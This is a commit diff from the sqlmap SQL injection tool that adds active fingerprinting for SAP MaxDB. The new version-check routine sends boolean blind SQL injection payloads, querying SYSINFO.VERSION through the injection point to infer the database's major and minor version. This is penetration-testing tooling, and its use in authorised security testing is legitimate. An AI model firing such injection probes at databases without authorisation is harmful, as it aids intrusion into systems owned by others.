implemented active fingerprinting for MaxDB

2024-11-25 11:03:47 +03:00 · 2010-08-30 14:16:23 +00:00 · 2010-08-30 14:16:23 +00:00 · 54f9828e06
commit 54f9828e06
parent 48cc87f6a9
2 changed files with 43 additions and 1 deletions
--- a/plugins/dbms/maxdb/enumeration.py
+++ b/plugins/dbms/maxdb/enumeration.py
@ -22,6 +22,8 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

+from lib.core.data import logger
+
 from plugins.generic.enumeration import Enumeration as GenericEnumeration

 class Enumeration(GenericEnumeration):
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@ -44,6 +44,46 @@ class Fingerprint(GenericFingerprint):
    def __init__(self):
        GenericFingerprint.__init__(self)

+    def __versionCheck(self):
+        infoMsg = "executing SAP MaxDB SYSINFO version check"
+        logger.info(infoMsg)
+
+        query   = agent.prefixQuery(" /* NoValue */")
+        query   = agent.postfixQuery(query)
+        payload = agent.payload(newValue=query)
+        result  = Request.queryPage(payload)
+
+        if not result:
+            warnMsg = "unable to perform SAP MaxDB version check"
+            logger.warn(warnMsg)
+
+            return None
+
+        minor, major = None, None
+
+        for version in [6, 7]:
+            query   = agent.prefixQuery(" AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
+            query   = agent.postfixQuery(query)
+            payload = agent.payload(newValue=query)
+            result  = Request.queryPage(payload)
+
+            if result:
+                major = version
+
+        for version in xrange(0, 10):
+            query   = agent.prefixQuery(" AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
+            query   = agent.postfixQuery(query)
+            payload = agent.payload(newValue=query)
+            result  = Request.queryPage(payload)
+
+            if result:
+                minor = version
+
+        if major and minor:
+            return "%s.%s" % (major, minor)
+        else:
+            return None
+
    def getFingerprint(self):
        value  = ""
        wsOsFp = formatFingerprint("web server", kb.headersFp)
@ -64,7 +104,7 @@ class Fingerprint(GenericFingerprint):
            value += "SAP MaxDB"
            return value

-        actVer = formatDBMSfp() + " (%s)" % None
+        actVer = formatDBMSfp() + " (%s)" % self.__versionCheck()
        blank  = " " * 15
        value += "active fingerprint: %s" % actVer